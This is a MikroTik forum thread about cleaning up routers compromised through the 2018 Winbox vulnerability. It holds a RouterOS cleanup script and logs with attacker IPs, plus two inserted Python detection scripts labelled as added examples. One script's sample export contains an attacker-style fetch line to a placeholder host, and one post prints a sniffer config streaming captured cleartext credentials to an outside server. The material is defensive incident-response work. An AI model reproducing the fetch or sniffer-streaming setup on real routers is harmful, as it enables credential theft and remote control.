43north
Member Candidate
Posts: 194
Joined: Fri Nov 14, 2014 7:06 am

Re: Winbox vulnerability: please upgrade

Wed Aug 08, 2018 2:52 am

It was empty where I checked, too. It's possibly just a presence indicator in the swarm for the C&C, as you also mentioned...
As I mentioned, my file was empty as well; makes sense with what you guys are saying.
 
kobuki
Member Candidate
Posts: 123
Joined: Sat Apr 02, 2011 5:59 pm

Re: Winbox vulnerability: please upgrade

Wed Aug 08, 2018 3:00 am

Is he trying to use Winbox to connect
No idea, but possible.
how would you route a Winbox connection through a socks proxy?
I assume that's a rhetorical question.
 
excession
just joined
Posts: 18
Joined: Mon May 11, 2015 8:16 pm

Re: Winbox vulnerability: please upgrade

Wed Aug 08, 2018 3:19 am

Is he trying to use Winbox to connect
No idea, but possible.
how would you route a Winbox connection through a socks proxy?
I assume that's a rhetorical question.
Haha, actually no, just one based on an almost complete ignorance of socks!
I did just find some interesting discussion here: viewtopic.php?t=101874
I think I now understand: I imagine he used an SSH client to open the SOCKS connection, then SSH to connect to his router through that tunnel.
 
aswin
just joined
Posts: 5
Joined: Tue Jul 11, 2017 6:26 pm

Re: Winbox vulnerability: please upgrade

Wed Aug 08, 2018 4:15 am

2. I have tried to log in to the remote MikroTik with that password but with no success, so I think the problem comes from the hacker allowing only IP 127.0.0.1 to log in with the "sys" account.
And the hacker uses a script to disable hard reset, so I just ask whether I can use the serial cable to log in. (The infected router is still located at another place.)
If you haven't figured it out yet, you could try connecting to 127.0.0.1 on your router using the socks service which has probably been enabled on your device by the attacker. That assumes you've already hacked the 'sys' user's password.
Smart idea. Is he trying to use Winbox to connect and if so how would you route a Winbox connection through a socks proxy?
From kobuki's suggestion, I used HTTP to log in via SOCKS, not Winbox.
 
blackzero
just joined
Posts: 18
Joined: Tue Aug 09, 2011 3:40 pm

Re: Winbox vulnerability: please upgrade

Wed Aug 08, 2018 12:26 pm

***
 
sporkman
just joined
Posts: 24
Joined: Thu May 02, 2013 4:37 am

Re: Winbox vulnerability: please upgrade

Thu Aug 09, 2018 8:59 am

If you're curious how the bug works, this article is a good read:

https://n0p.me/winbox-bug-dissection/

The vulnerability would have been less of a problem if Mik used industry-standard password-hashing methods - since the vulnerability allowed a remote attacker to download any file, and there's a file with a very weak encryption of the admin password, it makes getting a legit login really easy. If the password were properly encrypted, then the attacker would be out of luck or, at best, have to spend lots of effort cracking the password. And the better your password was, the harder to crack...

The bit about how Winbox fetches unsigned DLLs from the router is frightening as hell. You have a signed app (Winbox) grabbing DLLs (unsigned) from the router - imagine what an attacker could do by loading a trojaned DLL onto your Winbox-running PC.

I also saw a new variation on a hacked router today - they had started a packet sniffer watching for traffic on ports 20, 21, 110 and 143 and sending it off to a listener on the host 37.1.207.114. Fun trick! Looking for any cleartext passwords, I assume. If they were more adventurous, they'd grab 5060 UDP and make some free phone calls too.
 
mrz
MikroTik Support
Posts: 5702
Joined: Wed Feb 07, 2007 12:45 pm
Location: Latvia

Re: Winbox vulnerability: please upgrade

Thu Aug 09, 2018 10:25 am

Winbox has not fetched DLLs for quite some time now. Do not use old Winbox.
 
sporkman
just joined
Posts: 24
Joined: Thu May 02, 2013 4:37 am

Re: Winbox vulnerability: please upgrade

Thu Aug 09, 2018 10:51 am

Winbox has not fetched DLLs for quite some time now. Do not use old Winbox.
Don't tell me, tell the guy that wrote the blog post. He did see it happen in his tcpdump though; I don't think he wrote that more than 3-4 months ago.
 
allstarcomps
newbie
Posts: 25
Joined: Sat Jul 08, 2017 10:36 pm
Location: San Diego, CA, USA

Re: Winbox vulnerability: please upgrade

Tue Aug 14, 2018 12:11 am

Here is the script I wrote to clean up after the IP socks / "service" user attack hit some of the old routers I have. After cleaning up it downloads the latest ROS and does a midnight reboot to install the latest ROS and firmware. I do recommend testing in a lab before deploying in production. I did not check for disabled drop rules.
# keep more log lines in memory so the cleanup and the reboots can be reviewed later
/system logging action set memory-lines=1000 [find where name=memory]
# drop the firewall rules the attack added (commented "port NNN")
/ip firewall filter remove [/ip firewall filter find where comment ~ "port [0-9]*"];
# disable the SOCKS proxy, restore its defaults and clear its access list
/ip socks set enabled=no port=1080 max-connections=200 connection-idle-timeout=00:02:00;
/ip socks access remove [/ip socks access find];
# remove the dropped-in scripts, their schedulers and the "service" user
/system script remove [find where source~"mikrotik.php"]
/system script remove [find where source~"socks set enabled=yes"]
/system scheduler remove [find where name~"port"]
/system scheduler remove [find where owner="service"]
/user remove [find name=service]

# reboot just before midnight so the downloaded packages get installed
/system scheduler
add name=midnightReboot on-event="/system reboot \r\
    \ny" start-time=23:59:00
# on the next startup: remove both schedulers, upgrade the RouterBOARD firmware, reboot again
/system scheduler
add name=updateFirmware on-event="/system scheduler remove [find where name=\"up\
    dateFirmware\"]\r\
    \n:delay 2s\r\
    \n/system scheduler remove [find where name=\"midnightReboot\"]\r\
    \n/system routerboard upgrade\r\
    \n:delay 10s\r\
    \n/system reboot\r\
    \ny" start-time=startup
# fetch the latest RouterOS packages now; they install on the midnight reboot
/system package update download

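As an added example (not allstarcomps' script and not MikroTik code), a small Python audit of a RouterOS /export that reports the same leftovers the script above removes, plus the disabled drop rules it admits it does not check. The export text is constructed for the example and EXAMPLE-C2 is a placeholder host name.

```python
"""Audit a RouterOS '/export' for the leftovers the cleanup script above removes."""
import re
import shlex

# Constructed sample export (not from any real router), modelled on the
# indicators named in this thread: SOCKS enabled, a "service" user, a script
# fetching mikrotik.php, a scheduler owned by "service" and "port NNN" rules.
# EXAMPLE-C2 is a placeholder, not a real host.
SAMPLE_EXPORT = """\
/ip socks
set enabled=yes port=4145 max-connections=200
/ip socks access
add action=allow src-address=0.0.0.0/0
/system script
add name=script4_ owner=service policy=ftp,read,write source="/tool fetch url=http://EXAMPLE-C2/mikrotik.php mode=http"
/system scheduler
add interval=1d name=port43 on-event=script4_ owner=service start-time=startup
add name=backup-nightly on-event=backup owner=admin start-time=02:00:00
/user
add group=full name=service
add group=full name=admin
/ip firewall filter
add action=accept chain=input comment="port 443" dst-port=443 protocol=tcp
add action=accept chain=input dst-port=8291 protocol=tcp
add action=accept chain=input dst-port=22 protocol=tcp src-address-list=mgmt
add action=drop chain=input comment="drop everything else" disabled=yes in-interface=ether1
"""


def parse_export(text):
    """Yield (section, verb, params) for each add/set line of an export."""
    section = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if line.startswith("/"):          # a new "/path" opens a section
            section = line
            continue
        tokens = shlex.split(line)        # keeps "quoted values" together
        if section is None or not tokens:
            continue
        params = {}
        for tok in tokens[1:]:
            key, _, value = tok.partition("=")
            params[key] = value
        yield section, tokens[0], params


def audit_export(text):
    """Return human-readable findings; an empty list means nothing matched."""
    findings = []
    for section, verb, p in parse_export(text):
        name = p.get("name", "")
        if section == "/user" and name == "service":
            findings.append("user: unexpected account 'service'")
        elif section == "/ip socks" and verb == "set" and p.get("enabled") == "yes":
            findings.append(f"socks: proxy enabled on port {p.get('port', '?')}")
        elif section == "/ip socks access":
            findings.append(f"socks: ACL entry for {p.get('src-address', '?')}")
        elif section == "/system script" and re.search(
                r"mikrotik\.php|socks set enabled=yes", p.get("source", "")):
            findings.append(f"script: '{name}' fetches mikrotik.php or re-enables socks")
        elif section == "/system scheduler" and (
                p.get("owner") == "service" or "port" in name):
            findings.append(f"scheduler: '{name}' (owner={p.get('owner', '?')})")
        elif section == "/ip firewall filter":
            if re.match(r"port \d+", p.get("comment", "")):
                findings.append(f"filter: rule commented '{p['comment']}'")
            # Winbox reachable from anywhere is what the thread keeps warning about
            if (p.get("chain") == "input" and p.get("action") == "accept"
                    and "8291" in p.get("dst-port", "")
                    and not (p.get("src-address") or p.get("src-address-list"))):
                findings.append("filter: Winbox (8291) accepted from any source")
            # the case the cleanup script above says it does not check
            if p.get("action") == "drop" and p.get("disabled") == "yes":
                findings.append("filter: drop rule is disabled")
    return findings


if __name__ == "__main__":
    for finding in audit_export(SAMPLE_EXPORT):
        print(finding)
```

Feed it the output of `/export` (the real file may wrap long lines with a trailing backslash, which this parser does not join).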
 
CsXen
Frequent Visitor
Posts: 85
Joined: Wed Sep 10, 2014 8:31 pm
Location: Budapest - Hungary

Re: Winbox vulnerability: please upgrade

Wed Aug 22, 2018 7:04 pm

Hi.

When will you backport these vulnerability patches to the mipsle branch? I want to upgrade our RB532s and RB133s every time I read these security warnings, but no .npk is available. :)

Best regards: CsXen
 
normis
MikroTik Support
Topic Author
Posts: 23630
Joined: Fri May 28, 2004 11:04 am
Location: Riga, Latvia

Re: Winbox vulnerability: please upgrade

Thu Aug 23, 2018 9:28 am

Hi.

When will you backport these vulnerability patches to the mipsle branch? I want to upgrade our RB532s and RB133s every time I read these security warnings, but no .npk is available. :)

Best regards: CsXen
The v5 releases are NOT AFFECTED AT ALL. Quote from first post:
from 6.29
Also, use a firewall and you are safe. The vulnerability affects devices without any protection only.
 
npyoung
Frequent Visitor
Posts: 81
Joined: Thu Jun 10, 2004 2:40 am
Location: Applegate, OR, USA

Re: Winbox vulnerability: please upgrade

Thu Aug 23, 2018 9:43 am

How do you recover from this attack? We have 40 Dynadishes that are not responding to Winbox. They do respond partially on port 80, but act strangely. No SSL or telnet was enabled on these CPEs, so that approach is out. Any suggestions?
 
Deantwo
Member Candidate
Posts: 246
Joined: Tue Sep 30, 2014 4:07 pm

Re: Winbox vulnerability: please upgrade

Thu Aug 23, 2018 4:01 pm

How do you recover from this attack? We have 40 Dynadishes that are not responding to Winbox. They do respond partially on port 80, but act strangely. No SSL or telnet was enabled on these CPEs, so that approach is out. Any suggestions?
You could use netinstall to reinstall them.
See: https://wiki.mikrotik.com/wiki/Manual:Netinstall

Other than that, you might get better help if you send an e-mail to support.
See: https://mikrotik.com/support
 
kobuki
Member Candidate
Posts: 123
Joined: Sat Apr 02, 2011 5:59 pm

Re: Winbox vulnerability: please upgrade

Thu Aug 23, 2018 4:18 pm

They do respond partially on port 80, but act strangely.

What do you mean by that?
 
npyoung
Frequent Visitor
Posts: 81
Joined: Thu Jun 10, 2004 2:40 am
Location: Applegate, OR, USA

Re: Winbox vulnerability: please upgrade

Thu Aug 23, 2018 5:59 pm

They do respond partially on port 80, but act strangely.

What do you mean by that?
They are responding normally on port 80 now that I've put them behind a NAT, which I think should cut off access by the hacker. But, the username and/or password has been changed. Seems like there was a "service" entry in the users placed by the hack. Anyone know what the password is for that account?

More after hacking away. Most of them respond on port 80, and I was able to upgrade, turn off SOCKS, remove the service user and change the password. About 1/4 of them don't respond, indicate wrong user/pass, or show an error on the webpage. Noticed that the web server on some of them is trying to place malicious code.
 
npyoung
Frequent Visitor
Posts: 81
Joined: Thu Jun 10, 2004 2:40 am
Location: Applegate, OR, USA

Re: Winbox vulnerability: please upgrade

Thu Aug 23, 2018 8:30 pm

How do you recover from this attack? We have 40 Dynadishes that are not responding to Winbox. They do respond partially on port 80, but act strangely. No SSL or telnet was enabled on these CPEs, so that approach is out. Any suggestions?
You could use netinstall to reinstall them.
See: https://wiki.mikrotik.com/wiki/Manual:Netinstall

Other than that, you might get better help if you send an e-mail to support.
See: https://mikrotik.com/support
Already did. Thanks for the heads up on Netinstall.
 
CsXen
Frequent Visitor
Posts: 85
Joined: Wed Sep 10, 2014 8:31 pm
Location: Budapest - Hungary

Re: Winbox vulnerability: please upgrade

Fri Aug 24, 2018 11:22 am

When will you backport these vulnerability patches to the mipsle branch? I want to upgrade our RB532s and RB133s every time I read these security warnings, but no .npk is available. :)
The v5 releases are NOT AFFECTED AT ALL. Quote from first post:
from 6.29

Don't forget, the last version was routeros-mipsle-6.33.5 on the MIPSLE branch, which is vulnerable. So must I downgrade to a version prior to 6.29 to be safe?
(I can't firewall the Winbox port, because it must be accessible from anywhere, from mobile or wired internet too. And I can't predict the source IP... geoblocking would be a good solution. :) )

Best regards: CsXen
 
mrz
MikroTik Support
Posts: 5702
Joined: Wed Feb 07, 2007 12:45 pm
Location: Latvia

Re: Winbox vulnerability: please upgrade

Fri Aug 24, 2018 11:31 am

Use a VPN (like IPsec) to connect to the router and allow Winbox access only from the VPN.
 
npyoung
Frequent Visitor
Posts: 81
Joined: Thu Jun 10, 2004 2:40 am
Location: Applegate, OR, USA

Re: Winbox vulnerability: please upgrade

Sat Aug 25, 2018 6:22 am

They do respond partially on port 80, but act strangely.

What do you mean by that?
They are responding normally on port 80 now that I've put them behind a NAT, which I think should cut off access by the hacker. But, the username and/or password has been changed. Seems like there was a "service" entry in the users placed by the hack. Anyone know what the password is for that account?

More after hacking away. Most of them respond on port 80, and I was able to upgrade, turn off SOCKS, remove the service user and change the password. About 1/4 of them don't respond, indicate wrong user/pass, or show an error on the webpage. Noticed that the web server on some of them is trying to place malicious code.
But wait, there's more. After three days of cutting the infected devices off from the mother ship (killing all incoming direct connections using NAT), most of the Dynadishes that wouldn't allow remote access to fix will respond favorably to Netinstall. However, I did run into one today that was rebooting cyclically in such a way that it wouldn't respond to power off, press reset, power on to put it in Netinstall mode. So, one scrap.
 
mistry7
Forum Veteran
Posts: 966
Joined: Tue Oct 13, 2009 11:57 am
Location: Germany

Re: Winbox vulnerability: please upgrade

Sat Aug 25, 2018 7:15 am

If the hacker has left the devices with old software, you can use the same holes to get the set password; there are some Python scripts available for proof of concept.....
 
npyoung
Frequent Visitor
Posts: 81
Joined: Thu Jun 10, 2004 2:40 am
Location: Applegate, OR, USA

Re: Winbox vulnerability: please upgrade

Sat Aug 25, 2018 6:02 pm

If the hacker has left the devices with old software, you can use the same holes to get the set password; there are some Python scripts available for proof of concept.....
Problem is that for the Dynadishes that are the hard nuts to crack (i.e. not responding to Winbox as it's disabled by the hack, HTTP doesn't work well enough to get in, SSH and telnet turned off), there's no remote access to work with. It's interesting that some of these dishes, when presumably cut off from access to the mother ship by NAT, degrade to cyclically rebooting every minute or so, while some others seem to respond to a reboot and are nominally still running, even though they are infected.

BTW, what MT says about cleaning off the setup with a new one, absolutely true. Upgrading, changing passwords and rewinding the obvious stuff (second user "service", turning off SOCKS) just results in SOCKS being turned back on, and in the case of one router (in a remote area, wireless interface, which makes it hard to clean remotely), it went right back to a state where it cannot be connected to.
 
npyoung
Frequent Visitor
Posts: 81
Joined: Thu Jun 10, 2004 2:40 am
Location: Applegate, OR, USA

Re: Winbox vulnerability: please upgrade

Sat Aug 25, 2018 6:42 pm

Has anyone documented exactly what the hack does? Is it possible to expunge it completely without overwriting the device with a new clean restore file? When it comes to CPEs, the wireless interface precludes doing this remotely, as its MAC doesn't match up with the MAC that the clean restore was generated on.

BTW, MT, feel free to jump in here. Perhaps some software to clean the attack off of infected devices?
 
normis
MikroTik Support
Topic Author
Posts: 23630
Joined: Fri May 28, 2004 11:04 am
Location: Riga, Latvia

Re: Winbox vulnerability: please upgrade

Mon Aug 27, 2018 8:47 am

Has anyone documented exactly what the hack does? Is it possible to expunge it completely without overwriting the device with a new clean restore file? When it comes to CPEs, the wireless interface precludes doing this remotely, as its MAC doesn't match up with the MAC that the clean restore was generated on.

BTW, MT, feel free to jump in here. Perhaps some software to clean the attack off of infected devices?
Using the vulnerability described in the first post, somebody could get your password in clear text if you had unprotected access to Winbox.
When the person has your password, there are any number of things he could do. The currently most widespread attack was by somebody who connected to such routers and added a SOCKS proxy configuration that runs some cryptomining script in your web browser when you hit a not-found 404 webpage.
 
eider
newbie
Posts: 27
Joined: Thu Nov 30, 2017 10:14 pm

Re: Winbox vulnerability: please upgrade

Mon Aug 27, 2018 9:18 am

To add to what @normis said: I've observed the same attack, with SOCKS also attempting to send mass spam via port 25 (and only port 25) using a From field in the form of [random username]@[domain name from revdns]. The attack also added a script and a scheduler to run the script. The script was pointing at a /mikrotik.php file, but as far as I can tell, it was empty. Possibly it was removed from the attacker's server before I managed to check it, or it was not used yet.
 
mkx
Forum Guru
Posts: 1038
Joined: Thu Mar 03, 2016 10:23 pm

Re: Winbox vulnerability: please upgrade

Mon Aug 27, 2018 9:29 am

The script was pointing at a /mikrotik.php file, but as far as I can tell, it was empty. Possibly it was removed from the attacker's server before I managed to check it, or it was not used yet.
Regarding the empty mikrotik.php ... keep in mind that it's a PHP file which gets executed on the web server. It could well be that the point of that script on the server is to receive data about the owned router and, after it processes the data (the most important is the router's public IP address), it just returns an empty page of type text/plain ... so don't get overconfident just because the local file seems to be empty.
BR,
Metod
 
UGC
just joined
Posts: 3
Joined: Mon Nov 28, 2016 2:41 pm

Re: Winbox vulnerability: please upgrade

Mon Aug 27, 2018 10:51 am

Hello, everyone. I have some ROS 5.26 still running for some reasons. Does this vulnerability affect 5.26?
 
normis
MikroTik Support
Topic Author
Posts: 23630
Joined: Fri May 28, 2004 11:04 am
Location: Riga, Latvia

Re: Winbox vulnerability: please upgrade

Mon Aug 27, 2018 10:53 am

Hello, everyone. I have some ROS 5.26 still running for some reasons. Does this vulnerability affect 5.26?
No. Like the first post says, it affects only versions 6.26 and above (until the fixed versions, see first post).
 
UGC
just joined
Posts: 3
Joined: Mon Nov 28, 2016 2:41 pm

Re: Winbox vulnerability: please upgrade

Mon Aug 27, 2018 11:08 am

So, there is no need to upgrade it, if I am satisfied how it works?
 
normis
MikroTik Support
Topic Author
Posts: 23630
Joined: Fri May 28, 2004 11:04 am
Location: Riga, Latvia

Re: Winbox vulnerability: please upgrade

Mon Aug 27, 2018 11:15 am

Yes, but of course, you should do all the precautions regardless.

Use a non-standard port and username, implement a firewall and deny access from unknown addresses, etc.
 
UGC
just joined
Posts: 3
Joined: Mon Nov 28, 2016 2:41 pm

Re: Winbox vulnerability: please upgrade

Mon Aug 27, 2018 11:23 am

Yes, I did all the precautions except the port. I will change it now. Thanks for the answer.
 
eider
newbie
Posts: 27
Joined: Thu Nov 30, 2017 10:14 pm

Re: Winbox vulnerability: please upgrade

Tue Aug 28, 2018 3:54 pm

keep in mind that it's a PHP file which gets executed on the web server. It could well be that the point of that script on the server is to receive data about the owned router and, after it processes the data (the most important is the router's public IP address), it just returns an empty page of type text/plain
Yes. Monitoring of actively exploited routers is obvious (in fact there's not even a need for this to be a PHP file; a simple log analyzer would do the job), however the way the script was made, it could allow any commands from this file to be executed on the exploited routers.
 
Chupaka
Forum Guru
Posts: 8143
Joined: Mon Jun 19, 2006 11:15 pm
Location: Minsk, Belarus

Re: Winbox vulnerability: please upgrade

Wed Aug 29, 2018 6:48 pm

If the hacker has left the devices with old software, you can use the same holes to get the set password; there are some Python scripts available for proof of concept.....
Problem is that for the Dynadishes that are the hard nuts to crack (i.e. not responding to Winbox as it's disabled by the hack, HTTP doesn't work well enough to get in, SSH and telnet turned off), there's no remote access to work with.
Well, maybe there was MacWinBox access? :)
 
sunblade
just joined
Posts: 6
Joined: Tue Apr 06, 2010 6:53 pm

Re: Winbox vulnerability: please upgrade

Tue Sep 04, 2018 1:48 am

Hello,

The packet sniffer may feed IP 37.1.207.114 with data from the attacked router.

[xxx@yyy] /tool sniffer> print
only-headers: no
memory-limit: 100KiB
file-limit: 100KiB
streaming-enabled: yes
streaming-server: 37.1.207.114
filter-stream: yes
filter-interface: all
filter-ip-protocol: tcp,udp
filter-port: ftp-data,ftp,pop3,143,1500,10000

I have found some IP addresses of the machines that were used:

IP: 95.154.216.151

aug/22 21:20:24 system,info,account user admin logged in from 95.154.216.151 via winbox
aug/22 21:20:24 system,info socks acl entry added by admin
aug/22 21:20:24 system,info socks config changed by admin
aug/22 21:20:24 system,info new script added by admin
aug/22 21:20:24 system,info new script scheduled by admin
aug/22 21:20:24 system,info new script added by admin
aug/22 21:20:24 system,info new script scheduled by admin
aug/22 21:20:24 system,info new script added by admin
aug/22 21:20:24 system,info,account user admin logged out from 95.154.216.151 via winbox
aug/22 21:20:24 system,info new script scheduled by admin
aug/22 21:20:54 system,info script removed from scheduler by admin
aug/22 21:20:54 system,info filter rule changed by admin
aug/22 21:20:54 system,info script removed by admin
aug/22 21:20:54 system,info script removed from scheduler by admin
aug/22 21:20:54 system,info script removed by admin
***

IP: 198.100.28.129

aug/28 00:50:48 system,info,account user admin logged in from 198.100.28.129 via ssh
aug/28 00:51:12 system,info item changed by admin
aug/28 00:51:20 system,info item changed by admin
aug/28 00:51:27 system,info item changed by admin
aug/28 00:51:44 system,info,account user admin logged out from 198.100.28.129 via ssh
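Added example, not part of sunblade's post: a Python triage that reads log lines in the format shown above and the /tool sniffer print output, then flags logins from outside an assumed management network (10.0.0.0/8), the coarse config-change messages RouterOS does log, and sniffer streaming to an outside server. The sample lines are constructed with TEST-NET addresses and modelled on the post.

```python
"""Triage RouterOS log lines and sniffer settings for the activity described above."""
import ipaddress
import re

# Assumption for the example: management logins come from this network only.
TRUSTED_NETS = ("10.0.0.0/8",)

# Constructed sample log in the same format as the thread's lines;
# 203.0.113.0/24 is TEST-NET, used here as the "outside" address range.
SAMPLE_LOG = """\
aug/22 21:20:24 system,info,account user admin logged in from 203.0.113.5 via winbox
aug/22 21:20:24 system,info socks acl entry added by admin
aug/22 21:20:24 system,info socks config changed by admin
aug/22 21:20:24 system,info new script added by admin
aug/22 21:20:24 system,info new script scheduled by admin
aug/22 21:20:24 system,info,account user admin logged out from 203.0.113.5 via winbox
aug/22 21:20:54 system,info filter rule changed by admin
aug/23 08:10:02 system,info,account user admin logged in from 10.0.0.2 via winbox
aug/23 08:10:40 system,info item changed by admin
"""

# Constructed '/tool sniffer print' output shaped like the one quoted above.
SAMPLE_SNIFFER = """\
only-headers: no
streaming-enabled: yes
streaming-server: 203.0.113.9
filter-stream: yes
filter-ip-protocol: tcp,udp
filter-port: ftp-data,ftp,pop3,143,1500,10000
"""

LOG_RE = re.compile(r"^(?P<ts>\w{3}/\d{2} \d\d:\d\d:\d\d) (?P<topics>\S+) (?P<msg>.*)$")
LOGIN_RE = re.compile(r"user (?P<user>\S+) logged in from (?P<ip>\S+) via (?P<via>\w+)")
# RouterOS logs only a coarse category, not the command itself, so this is all
# there is to key on; the generic "item changed" line is deliberately not matched.
TAMPER_RE = re.compile(r"socks|script|scheduler|filter rule|sniffer|user (added|changed|removed)")


def parse_log(text):
    """Split log lines into timestamp, topics and message."""
    return [m.groupdict() for m in map(LOG_RE.match, text.splitlines()) if m]


def is_trusted(ip, trusted_nets):
    try:
        addr = ipaddress.ip_address(ip)
    except ValueError:              # host names or garbage are never trusted
        return False
    return any(addr in ipaddress.ip_network(net) for net in trusted_nets)


def untrusted_logins(events, trusted_nets):
    """Logins whose source address lies outside the trusted networks."""
    hits = []
    for ev in events:
        m = LOGIN_RE.search(ev["msg"])
        if m and not is_trusted(m["ip"], trusted_nets):
            hits.append((ev["ts"], m["user"], m["ip"], m["via"]))
    return hits


def tamper_events(events):
    """Config changes of the kinds this thread associates with the attack."""
    return [(ev["ts"], ev["msg"]) for ev in events if TAMPER_RE.search(ev["msg"])]


def sniffer_streaming_target(print_output, trusted_nets):
    """Return the streaming server if the sniffer streams to an untrusted host."""
    settings = {}
    for line in print_output.splitlines():
        key, sep, value = line.partition(":")
        if sep:
            settings[key.strip()] = value.strip()
    server = settings.get("streaming-server", "")
    if settings.get("streaming-enabled") == "yes" and server and not is_trusted(server, trusted_nets):
        return server
    return None


def triage(log_text, sniffer_text, trusted_nets=TRUSTED_NETS):
    events = parse_log(log_text)
    return {
        "untrusted_logins": untrusted_logins(events, trusted_nets),
        "tamper_events": tamper_events(events),
        "sniffer_streaming_to": sniffer_streaming_target(sniffer_text, trusted_nets),
    }


if __name__ == "__main__":
    for key, value in triage(SAMPLE_LOG, SAMPLE_SNIFFER).items():
        print(key, value)
```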
 
Jotne
Forum Veteran
Posts: 708
Joined: Sat Dec 24, 2016 11:17 am

Re: Winbox vulnerability: please upgrade

Tue Sep 04, 2018 8:05 am

aug/22 21:20:24 system,info socks acl entry added by admin
aug/28 00:51:27 system,info item changed by admin
Think how much easier it would be to debug this if MikroTik logged all commands executed on the router.
Please, MT, do like other network vendors and make all commands visible in the log.
On Cisco you can get it from AAA (TACACS), which several people have requested, or using syslog.
 
rwf
Frequent Visitor
Posts: 52
Joined: Fri Dec 22, 2006 11:38 pm

Re: Winbox vulnerability: please upgrade

Wed Sep 05, 2018 1:23 am

BrianHiggins,
I seemed to find it only on routers running Hotspot.

One interesting thing I noted was that the only routers I found compromised were also routers running additional services or with NAT rules exposing services. I'm guessing they didn't scan for 8291; they instead scanned for something else to build the list of IPs to target. Every single router that was otherwise locked down without any services besides 8291 exposed, regardless of build number, remained uncompromised. Might just be a coincidence, but it was worth noting.
 
indnti
Frequent Visitor
Posts: 61
Joined: Thu Nov 09, 2006 11:53 am

Re: Winbox vulnerability: please upgrade

Wed Sep 05, 2018 3:04 pm

If you're curious how the bug works, this article is a good read:
https://n0p.me/winbox-bug-dissection/
This article, or rather the new vulnerability CVE-2018-14847, makes me afraid of using any MikroTik product anymore.
 
normis
MikroTik Support
Topic Author
Posts: 23630
Joined: Fri May 28, 2004 11:04 am
Location: Riga, Latvia

Re: Winbox vulnerability: please upgrade

Wed Sep 05, 2018 3:25 pm

If you're curious how the bug works, this article is a good read:
https://n0p.me/winbox-bug-dissection/
This article, or rather the new vulnerability CVE-2018-14847, makes me afraid of using any MikroTik product anymore.
There is no new vulnerability, it is all the same old. It is in one of the first sentences of that article.
 
blimbach
just joined
Posts: 8
Joined: Fri Mar 04, 2016 3:39 pm

Re: Winbox vulnerability: please upgrade

Wed Sep 05, 2018 4:15 pm

Currently heise.de writes about attacks on MikroTik devices. Maybe you can correct something on the part of MikroTik, because the news does not sound good.

https://www.heise.de/security/meldung/S ... 55288.html

They refer to the following security audit:

https://blog.netlab.360.com/7500-mikrot ... -yours-en/

BR
Boris
 
normis
MikroTik Support
Topic Author
Posts: 23630
Joined: Fri May 28, 2004 11:04 am
Location: Riga, Latvia

Re: Winbox vulnerability: please upgrade

Wed Sep 05, 2018 4:19 pm

Boris, did you read the first post in this thread? Did you read the blog entry?
https://blog.mikrotik.com/security/winb ... ility.html
 
blimbach
just joined
Posts: 8
Joined: Fri Mar 04, 2016 3:39 pm

Re: Winbox vulnerability: please upgrade

Wed Sep 05, 2018 4:26 pm

Boris, did you read the first post in this thread? Did you read the blog entry?
https://blog.mikrotik.com/security/winb ... ility.html
Hello Normis, I think I have read and understood all the available information. Nevertheless, heise.de reports as if the security fix by MikroTik is at least questionable.

My post was not a complaint. I just wanted to point out this - possibly false - reporting.
 
normis
MikroTik Support
Topic Author
Posts: 23630
Joined: Fri May 28, 2004 11:04 am
Location: Riga, Latvia

Re: Winbox vulnerability: please upgrade

Wed Sep 05, 2018 4:28 pm

I have contacted them on behalf of MikroTik. Let's see if it helps
 
bsiege
just joined
Posts: 2
Joined: Sat Feb 27, 2016 5:31 pm

Re: Winbox vulnerability: please upgrade

Wed Sep 05, 2018 4:48 pm

This article, or rather the new vulnerability CVE-2018-14847, makes me afraid of using any MikroTik product anymore.

There is no new vulnerability, it is all the same old. It is in one of the first sentences of that article.
What's new in 6.42.7 (2018-Aug-17 09:48):
MAJOR CHANGES IN v6.42.7:
----------------------
!) security - fixed vulnerabilities CVE-2018-1156, CVE-2018-1157, CVE-2018-1158, CVE-2018-1159;
----------------------
Normally new flaw = new CVE. Be careful to verify!!
 
BartoszP
Forum Guru
Posts: 1626
Joined: Mon Jun 16, 2014 1:13 pm
Location: Poland

Re: Winbox vulnerability: please upgrade

Wed Sep 05, 2018 5:05 pm

...
This article, or rather the new vulnerability CVE-2018-14847, makes me afraid of using any MikroTik product anymore.
I have looked here https://tools.cisco.com/security/center ... nListing.x and I'm wondering who uses these products?
And you are lucky if you have software upgrade plan active :-)
 
kobuki
Member Candidate
Posts: 123
Joined: Sat Apr 02, 2011 5:59 pm

Re: Winbox vulnerability: please upgrade

Wed Sep 05, 2018 5:24 pm

Currently heise.de writes about attacks on MikroTik devices. Maybe you can correct something on the part of MikroTik, because the news does not sound good.

https://www.heise.de/security/meldung/S ... 55288.html
It looks like a clickbait, smelling pile of misinformational crap. They better fix the bullshitting there.
 
msatter
Forum Veteran
Posts: 967
Joined: Tue Feb 18, 2014 12:56 am
Location: Netherlands / Nīderlande

Re: Winbox vulnerability: please upgrade

Wed Sep 05, 2018 5:37 pm

I am deeply disappointed by Heise for not investigating further for themselves and inquiring with MikroTik. I had high regard for Heise as a reliable and trustworthy news source.

They neglected the bugfix version and declared any version below 6.42.x as unsafe. That Heise made this blunder is shocking.

They have now made an update to the news item to correct some errors made by them.

Update: in the update it seems that MikroTik has no love for the bugfix version, because it is not mentioned at all! Be complete in your communications! I keep repeating that.
 
schadom
Member Candidate
Posts: 119
Joined: Sun Jun 25, 2017 2:47 am
Location: Austria

Re: Winbox vulnerability: please upgrade

Thu Sep 06, 2018 2:22 am

I am deeply disappointed by Heise for not investigating further for themselves and inquiring with MikroTik. I had high regard for Heise as a reliable and trustworthy news source.

They neglected the bugfix version and declared any version below 6.42.x as unsafe. That Heise made this blunder is shocking.

They have now made an update to the news item to correct some errors made by them.

Update: in the update it seems that MikroTik has no love for the bugfix version, because it is not mentioned at all! Be complete in your communications! I keep repeating that.

And I'm deeply concerned by the thousands of admins and Mikrotik customers who evidently were unable to shield their Winbox, Webfig, Telnet and SSH management ports from the global internet, despite numerous warnings in the forums and wiki. I still believe Mikrotik's default configuration is too weak for the majority of their lazy/inexperienced customers, therefore I'd suggest to ship future ROS releases in Fortknox-mode by default. Additionally, red warning messages and confirmation popups ("Are you really sure?") should be added to Winbox/Webfig, for example if someone tries to configure Winbox/Webfig/Telnet/SSH to be reachable from 0.0.0.0/0 instead of a specific host, network or RFC1918 range. Also, password complexity could be enforced by default.

Unlike other vendors' products like Cisco, Juniper, etc., Mikrotik's products are (more or less) targeted towards smaller environments, home setups and CPEs or WISPs, where people often are not even familiar with basic security principles or are just very lazy. While I agree it's not Mikrotik's job to educate those people regarding security, the outcome of people's laziness and lack of knowledge could at some point in the future hit us all very badly, e.g. Mirai a few months ago.
 
